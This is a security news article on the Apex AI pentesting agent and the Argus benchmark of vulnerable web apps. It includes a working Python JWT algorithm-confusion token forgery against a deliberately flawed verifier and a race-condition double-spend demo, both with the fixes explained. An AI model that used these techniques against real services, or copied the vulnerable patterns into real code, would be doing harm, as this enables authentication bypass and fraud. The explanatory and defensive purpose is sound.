The catalyst for Apex is a structural breakdown in how software security is practiced. AI coding agents are generating and merging code at machine scale: Stripe’s coding agents alone merge 1,300 pull requests per week, while some engineering teams spend over $1,000 per engineer daily on AI tokens, with zero human code review.
Traditional scanners and human-led assessments cannot keep pace with this velocity. Apex was built as the adversarial verification layer: a separate agent that attacks the running application exactly as a real attacker would, catching vulnerabilities before they become breaches.
Apex operates across three deployment modes. In CI pipelines, it validates every deploy against a sandboxed replica of the application, mapping the attack surface and attempting exploitation before code merges.
Against production, it continuously surfaces exploitable weaknesses in real time. It also supports on-demand testing against any target, replacing the quarterly PDF engagement with a feedback loop that operates at the speed of modern threats.
To validate its capabilities, PensarAI built Argus, an open-source benchmark of 60 self-contained, Dockerized vulnerable web applications purpose-built for evaluating offensive security agents.
Existing benchmarks were deemed insufficient: the most widely used suite, XBOW’s 104-challenge set, is 70% PHP, covers single-vulnerability targets, and lacks GraphQL, JWT algorithm confusion, race conditions, prototype pollution chains, WAF bypass, and multi-tenant isolation scenarios.
Argus spans the frameworks dominating production: Node.js/Express (40%), Python/Flask/Django (20%), multi-service architectures (25%), Go, Java/Spring Boot, and PHP.
It introduces categories no other benchmark covers: WAF and IDS evasion, multi-step exploit chains requiring up to 7 chained vulnerabilities, multi-tenant isolation failures, race conditions and business logic flaws, modern authentication bypasses (JWT, OAuth, SAML, MFA), and cloud/Kubernetes infrastructure attacks. Difficulty is calibrated across 2 easy, 27 medium, and 31 hard challenges.
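One of the categories above, JWT algorithm confusion, is worth unpacking. The attack works against verifiers that trust the attacker-controlled `alg` field in the token header: a token meant to be verified with RSA (RS256) is re-signed with HMAC (HS256) using the server's public key as the secret, and the confused verifier accepts it. The following is a minimal, self-contained sketch of that flaw; the key string, claims, and `naive_verify` function are all hypothetical illustrations, not code from Argus or Apex.

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

# Hypothetical server RSA public key: any string the attacker can fetch
# (e.g. from a JWKS endpoint) works as the HMAC "secret" in this attack.
PUBLIC_KEY = b"-----BEGIN PUBLIC KEY-----\nMIIBIjAN...\n-----END PUBLIC KEY-----"

# Attacker forges a token: switches alg from RS256 to HS256 and signs
# with the server's *public* key as the HMAC secret.
header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"sub": "admin"}).encode())
sig = b64url(hmac.new(PUBLIC_KEY, f"{header}.{payload}".encode(),
                      hashlib.sha256).digest())
forged = f"{header}.{payload}.{sig}"

def naive_verify(token: str, key: bytes) -> dict:
    """Vulnerable verifier: picks the algorithm from the token header."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h))["alg"]
    if alg == "HS256":  # attacker-controlled branch -- this is the bug
        expected = b64url(hmac.new(key, f"{h}.{p}".encode(),
                                   hashlib.sha256).digest())
        if not hmac.compare_digest(s, expected):
            raise ValueError("bad signature")
    # (real RS256 branch omitted; never reached for the forged token)
    return json.loads(b64url_decode(p))

print(naive_verify(forged, PUBLIC_KEY))  # → {'sub': 'admin'}
```

The fix is the standard one: pin an explicit algorithm allowlist server-side and never derive the verification algorithm from the token itself.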
Apex was pointed at all 60 Argus challenges in full black-box mode using Claude Haiku 4.5, the smallest, cheapest model available, to isolate architectural gains over raw model capability.
Apex achieved a 35% pass rate, outperforming PentestGPT (30%) and Raptor (27%). On the top 10 hardest challenges using Claude Opus 4.6, the gap widened substantially: Apex solved 80%, PentestGPT reached 70%, and Raptor hit 60%.
Across the full run, Apex discovered 271 unique vulnerabilities spanning SQL injection, SSRF, NoSQL injection, prototype pollution, SSTI, XXE, race conditions, IDOR, auth bypass, CORS misconfigurations, command injection, and path traversal. The average cost per challenge was approximately $8, with the entire 60-challenge run on Haiku costing under $500.
Notable solves included a 7-step race-condition double-spend in a fintech transfer endpoint, a multi-tenant SSRF chain pivoting through a shared cache to extract API keys from neighboring tenants, and a SpEL injection achieving remote code execution on a Java Spring Boot application, all in under 15 minutes.
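The race-condition double-spend follows a familiar pattern: a check-then-debit sequence with no locking, so concurrent requests all pass the balance check before any debit lands. A minimal Python sketch, using a hypothetical in-memory balance rather than the fintech app's actual code, shows the window:

```python
import threading
import time

balance = {"acct": 100}  # hypothetical account with 100 units

def vulnerable_transfer(amount: int) -> None:
    # Check-then-act with no lock: the classic TOCTOU window.
    if balance["acct"] >= amount:
        time.sleep(0.05)          # simulated DB round-trip widens the race
        balance["acct"] -= amount

# Five concurrent requests each try to move the full balance.
threads = [threading.Thread(target=vulnerable_transfer, args=(100,))
           for _ in range(5)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(balance["acct"])  # typically -400: five transfers drained 100 units
```

Real exploitation fires the concurrent HTTP requests against the transfer endpoint instead of threads in-process; the defense is the same either way: an atomic compare-and-debit (e.g. a conditional `UPDATE ... WHERE balance >= amount`) or row-level locking.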
Apex’s documented failure modes are instructive. Last-mile execution (completing the final credential-extraction step after a successful SSRF chain) emerged as the dominant gap. Decoy flags misled the agent twice, and complex multi-step chains such as CI/CD pipeline poisoning and Kubernetes compromise exceeded the 30-minute budget.
Both Apex and the Argus benchmark are available as open source on GitHub today.
The post Apex – AI-Powered Pentester Attacks Apps in Black-Box Mode to Find Vulnerabilities appeared first on Cyber Security News.